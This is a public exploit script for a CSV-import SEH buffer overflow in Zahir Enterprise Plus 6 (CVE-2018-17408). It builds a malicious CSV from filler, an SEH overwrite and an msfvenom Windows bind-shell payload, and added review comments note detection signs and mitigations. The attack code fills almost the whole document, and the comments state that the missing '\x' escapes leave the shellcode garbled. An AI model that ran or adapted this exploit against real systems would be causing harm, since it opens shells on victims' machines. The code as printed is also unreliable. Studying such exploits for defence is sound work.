# Exploit Title: Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)
# Google Dork: -
# Date: 2018-09-28
# Exploit Author: modpr0be
# Vendor Homepage: http://www.zahiraccounting.com/
# Software Link: http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip
# Version: 6 (build 10b) - Download here: http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip
# Tested on: Windows 7 x86/64bit
# CVE : N/A (the banner printed by the script below cites CVE-2018-17408)
# Category: local & privilege escalation
#
# Description
# The vulnerability occurs when Zahir cannot handle large inputs from an anomalously crafted CSV file.
# The Zahir main program fails to process the CR LF (Carriage Return Line Feed) characters, which
# causes the Zahir main program to crash.
#
# Credits to f3ci, who found the vulnerability.
#
# Proof of Concept
#!/usr/bin/python

import struct

# msfvenom -p windows/shell_bind_tcp -a x86 -b 'x00x0ax0dx22x2c'
# -n 20 -e x86/shikata_ga_nai -f python -v sc
# we won't worry about the space, it's big enough!
# badchars are 00,0a,0d,22,2c
#
# NOTE(review): per the msfvenom command above, `sc` is meant to be a Windows
# bind-shell payload, i.e. on success the target process opens a listening
# TCP socket - an unexpected listener owned by the Zahir process is the
# observable a defender can alert on.  The excluded bytes (00, 0a, 0d, 22, 2c
# = NUL, LF, CR, '"', ',') are exactly the bytes a CSV reader treats
# specially, which matches the CR/LF handling bug described in the header.
# NOTE(review): as printed here, every literal contains the characters
# `x92x91...` rather than `\x` escapes, so `sc` is plain ASCII text roughly
# three times the intended byte length, not the encoded x86 bytes.  The
# file this script writes is therefore not the original PoC content.
sc = ""
sc += "x92x91xf5x99x98xf5xd6x48x48x3fx2fx99x4a"
sc += "x42x9fx2fx42x43x43x42xb8x8cxa3xb1xa0xdd"
sc += "xc0xd9x74x24xf4x5bx31xc9xb1x53x31x43x12"
sc += "x83xc3x04x03xcfxadx53x55x33x59x11x96xcb"
sc += "x9ax76x1ex2exabxb6x44x3bx9cx06x0ex69x11"
sc += "xecx42x99xa2x80x4axaex03x2exadx81x94x03"
sc += "x8dx80x16x5exc2x62x26x91x17x63x6fxccxda"
sc += "x31x38x9ax49xa5x4dxd6x51x4ex1dxf6xd1xb3"
sc += "xd6xf9xf0x62x6cxa0xd2x85xa1xd8x5ax9dxa6"
sc += "xe5x15x16x1cx91xa7xfex6cx5ax0bx3fx41xa9"
sc += "x55x78x66x52x20x70x94xefx33x47xe6x2bxb1"
sc += "x53x40xbfx61xbfx70x6cxf7x34x7exd9x73x12"
sc += "x63xdcx50x29x9fx55x57xfdx29x2dx7cxd9x72"
sc += "xf5x1dx78xdfx58x21x9ax80x05x87xd1x2dx51"
sc += "xbaxb8x39x96xf7x42xbaxb0x80x31x88x1fx3b"
sc += "xddxa0xe8xe5x1axc6xc2x52xb4x39xedxa2x9d"
sc += "xfdxb9xf2xb5xd4xc1x98x45xd8x17x34x4dx7f"
sc += "xc8x2bxb0x3fxb8xebx1axa8xd2xe3x45xc8xdc"
sc += "x29xeex61x21xd2x01x2exacx34x4bxdexf8xef"
sc += "xe3x1cxdfx27x94x5fx35x10x32x17x5fxa7x3d"
sc += "xa8x75x8fxa9x23x9ax0bxc8x33xb7x3bx9dxa4"
sc += "x4dxaaxecx55x51xe7x86xf6xc0x6cx56x70xf9"
sc += "x3ax01xd5xcfx32xc7xcbx76xedxf5x11xeexd6"
sc += "xbdxcdxd3xd9x3cx83x68xfex2ex5dx70xbax1a"
sc += "x31x27x14xf4xf7x91xd6xaexa1x4exb1x26x37"
sc += "xbdx02x30x38xe8xf4xdcx89x45x41xe3x26x02"
sc += "x45x9cx5axb2xaax77xdfxc2xe0xd5x76x4bxad"
sc += "x8cxcax16x4ex7bx08x2fxcdx89xf1xd4xcdxf8"
sc += "xf4x91x49x11x85x8ax3fx15x3axaax15"

# Layout of the CSV body, as the statements below build it:
#   3041 'A' + one space + 380 'A'  -> 3422 bytes of filler up to the SEH record
#   nSEH                            -> author's comment: a short jump (4 bytes intended)
#   SEH handler                     -> 0x52016661, described by the author as a
#                                      pop/pop/ret inside vclie100.bpl
#   4 NOPs intended, then the payload, then 'D' padding to 5000 bytes total
# NOTE(review): a handler address taken from a third-party .bpl presumably
# means that module was built without SafeSEH - worth confirming; SEHOP and
# SafeSEH-enforced linking are the platform mitigations for this overwrite
# class, and a crash in vclie100.bpl with a CSV open is the forensic clue.
junk = "A" * 3041
junk += ' '  # the filler is split by a single space; the reason is not stated in the source
junk += 'A' * 380
# NOTE(review): as printed, "xebx08x90x90" is 12 ASCII characters, not the
# 4 bytes the comment implies (the `\x` escape prefixes are missing here).
junk += "xebx08x90x90" # nseh
# struct.pack is the only line that emits raw bytes: 0x52016661 little-endian.
# The path in the comment also lost its separators in this copy.
junk += struct.pack('<L',0x52016661) #seh pop ecx # pop ebp # ret 0x04 (C:Program Filesahir Personal 6 - Demo Versionvclie100.bpl)
junk += 'x90x90x90x90'  # same caveat as nSEH: 12 characters here, not 4 NOP bytes
junk += sc
# Pad to exactly 5000 bytes.  If len(junk) already exceeds 5000, the multiplier
# is negative and Python yields "" - no error, the file is simply longer.
junk += "D" * (5000-len(junk))

# Python 2 `print` statements: under Python 3 this script is a SyntaxError
# and writes nothing.  The banner below is the only place on the page that
# names CVE-2018-17408; the header above says "CVE : N/A".
print """
#===============================================================================#
| ____ __ |
| / __/__ ___ ___ / /____ _______ _ |
| _ / _ / -_) _ / __/ -_) __/ _ `/ |
| /___/ .__/\__/_//_/\__/\__/_/ \_,_/ |
| /_/ |
| |
| Zahir Enterprise Plus 6 <= build 10b Stack Overflow Vulnerability (0day) |
| CVE-2018-17408 |
| by modpr0be & f3ci (research[at]spentera.com) |
#===============================================================================#
"""
print "[+] Preparing for file.."
# Written in text mode ('w') into the current directory; on Windows text mode
# would rewrite LF as CR LF, which only matters if the payload contained 0x0a
# (excluded as a bad char above).  No try/finally: an OSError here leaves
# the handle to the interpreter to clean up.
f = open('exploit.csv', 'w')
print "[+] Writing exploit code on a CSV file.."
f.write(junk)
f.close()
# The resulting file - a ~5000-byte single-record CSV made almost entirely of
# repeated 'A'/'D' characters - is the artefact an import-time file scan or
# a crash dump would surface.
print "[+] Success writing file.. bring to Mr. Zahir."